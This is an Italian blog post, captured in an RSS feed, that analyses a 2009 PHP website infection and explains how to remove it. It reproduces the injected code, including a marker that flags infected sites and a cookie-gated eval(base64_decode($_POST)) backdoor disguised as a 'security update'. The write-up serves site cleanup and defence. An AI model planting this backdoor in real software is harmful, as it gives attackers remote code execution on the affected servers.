<span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;security_update&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//do not remove this line - important security update!</span>
&nbsp;
<span style="color: #339933;">&lt;---</span> CODICE ORIGINALE DELLA PAGINA <span style="color: #339933;">---&gt;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">?&gt;</span>
                <span style="color: #339933;">&lt;</span> ?php
                <span style="color: #000000; font-weight: bold;">function</span> security_update<span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span>
                <span style="color: #009900;">&#123;</span>
                        <span style="color: #000088;">$update</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">'18446744073709551615'</span><span style="color: #339933;">;</span>
                        <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">stristr</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'&lt;/html'</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!==</span> <span style="color: #009900; font-weight: bold;">FALSE</span><span style="color: #009900;">&#41;</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #990000;">eregi_replace</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'&lt;/html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$update</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'&lt;html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                        <span style="color: #b1b100;">else</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #000088;">$buffer</span><span style="color: #339933;">.</span><span style="color: #000088;">$update</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                <span style="color: #009900;">&#125;</span>
                <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>Come potete vedere analizzando il codice la funzione &#8220;<strong>security_update</strong>&#8221; non fa altro che inserire tutto l&#8217;output originale della propria pagina in un buffer e successivamente accodare al buffer il valore &#8220;<strong>18446744073709551615</strong>&#8220;.</p>
<p>La domanda che sorge è: <strong>perché?</strong></p>
<p>Sebbene stia tenendo d&#8217;occhio l&#8217;evolversi di questo hack non si è ancora individuato il motivo di tale azione. L&#8217;ipotesi che al momento appare essere la più veritiera è che venga utilizzato questo codice come &#8220;<strong>marcatore</strong>&#8221; dei siti &#8220;infetti&#8221; così da poterli facilmente trovare in una eventuale <a href="http://www.google.it/search?hl=it&amp;q=inurl%3Aindex.php+%2B18446744073709551615+&amp;sourceid=navclient-ff&amp;rlz=1B3GGGL_itIT312IT312&amp;ie=UTF-8&amp;aq=t&amp;oq=inurl%3Aindex.php+%2B18446744073709551615+" target="_blank"><strong>ricerca in rete</strong></a>.</p>
<p>In questo modo chi sta effettuando tali hack potrà individuare le proprie vittime e i siti per i quali conosce la falla di sicurezza che ha consentito di scrivere, per ora, il numero &#8220;<strong>18446744073709551615</strong>&#8220;.</p>
<p>Vedendo l&#8217;andamento delle ultime settimane ho assistito ad un&#8217;<strong>evoluzione dello script</strong> in quanto è stata aggiunta una nuova riga che potrebbe essere realmente dannosa per le vittime. Questo il codice nella sua nuova versione:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
<span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;security_update&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//do not remove this line - important security update!</span>
 <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">md5</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'73043475c0893e30'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">==</span><span style="color: #0000ff;">&quot;59fdd20854f4a2056c082cab53e64860&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #990000;">exit</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span><span style="color: #339933;">&lt;</span> ?php</pre></td></tr></table></div>

<p>Questo script ha in più <strong>un check su un cookie</strong> che, se verificato (<strong>$_COOKIE['73043475c0893e30'])==&#8221;59fdd20854f4a2056c082cab53e64860&#8243;</strong>), esegue una decodifica di un file criptato inviato via <strong>POST</strong>.</p>
<p>In questo modo l&#8217;hacker ha la possibilità di inviare file a tutti i domini che precedentemente aveva infettato e &#8220;marcato&#8221;.</p>
<p>Per ora non ho assistito ad azioni concrete che hanno sfruttato questa funzione &#8220;<strong>security_update()</strong>&#8221; ma, ovviamente, è naturale pensare che lo script e le sue evoluzioni siano vari step di un&#8217;azione mirata a raccogliere centinaia di siti infetti per effettuare in seguito un attacco di massa.</p>
<h1><strong>Come eliminarlo?</strong></h1>
<p>Per eliminarlo basta individuare tutte le pagine che mostrano il numero &#8220;<strong>18446744073709551615</strong>&#8221; e ripulirle dal codice di questo hack mostrato in precedenza.</p>
<p>Anche in questo caso il programma &#8220;<a href="http://www.powergrep.com/" target="_blank"><strong>PoweGrep</strong></a>&#8221; ci torna comodo permettendoci di effettuare una ricerca della stringa &#8220;<strong>18446744073709551615</strong>&#8221; su tutti i file del proprio sito (in locale).</p>
<p>Una volta individuate la pagine vanno rimosse queste righe dalla parte superiore della pagina:</p>
</pre>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
<span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;security_update&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//do not remove this line - important security update!</span>
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">md5</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'73043475c0893e30'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">==</span><span style="color: #0000ff;">&quot;59fdd20854f4a2056c082cab53e64860&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #990000;">exit</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>(la riga 3 non è presente in tutte le versioni)</p>
<p>e queste rige dalla fine:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="code"><pre class="php" style="font-family:monospace;">                <span style="color: #339933;">&lt;</span> ?php
                <span style="color: #000000; font-weight: bold;">function</span> security_update<span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span>
                <span style="color: #009900;">&#123;</span>
                        <span style="color: #000088;">$update</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">'18446744073709551615'</span><span style="color: #339933;">;</span>
                        <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">stristr</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'&lt;/html'</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!==</span> <span style="color: #009900; font-weight: bold;">FALSE</span><span style="color: #009900;">&#41;</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #990000;">eregi_replace</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'&lt;/html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$update</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'&lt;html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                        <span style="color: #b1b100;">else</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #000088;">$buffer</span><span style="color: #339933;">.</span><span style="color: #000088;">$update</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                <span style="color: #009900;">&#125;</span>
                <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<h1>Possibilità di infezione</h1>
<p>Non ho determinato, per ora, se l'infezione avviene tramite una vulnerabilità del proprio applicativo web o se invece avviene via Ftp sfruttando le credenziali del proprio Client Ftp.</p>
<p>In ambo i casi i consigli sono sempre gli stessi e fanno sempre bene:</p>
<p>1) Verificare presso siti di sicurezza come <a href="http://secunia.com/" target="_blank"><strong>Secunia</strong></a> o <a href="http://www.securityfocus.com/" target="_blank"><strong>SecurityFocus</strong></a> o <a href="http://www.milw0rm.com/" target="_blank"><strong>Milw0rm</strong> </a>eventuali nuove vulnerabilità dei propri applicativi/script/cms.</p>
<p>2) Eseguire periodicamente <strong>scansioni complete dei propri PC con software AntiMalware,AntiSpyware, etc</strong>. In particolare consiglio l'utilizzo di <a href="http://www.malwarebytes.org/mbam.php" target="_blank"><strong>Malwarebytes' Anti-Malware</strong></a> che  include tutte queste protezioni in un unica soluzione</p>
<p>Chiunque abbia informazioni al riguardo e volesse condividerle mi scriva all'indirizzo <a href="mailto:capn3m0@capn3m0.org"><strong>capn3m0@capn3m0.org</strong></a></p>
<p><br class="spacer_" /></p>
<p><strong>AGGIORNAMENTO DELL'8/11/2009:</strong> <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html" target="_self">[HACK] – Cannot redeclare security_update(), alla fine è arrivato!</a></p>
<p><br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Served from: www.capn3m0.org @ 2012-02-08 05:54:56 by W3 Total Cache -->
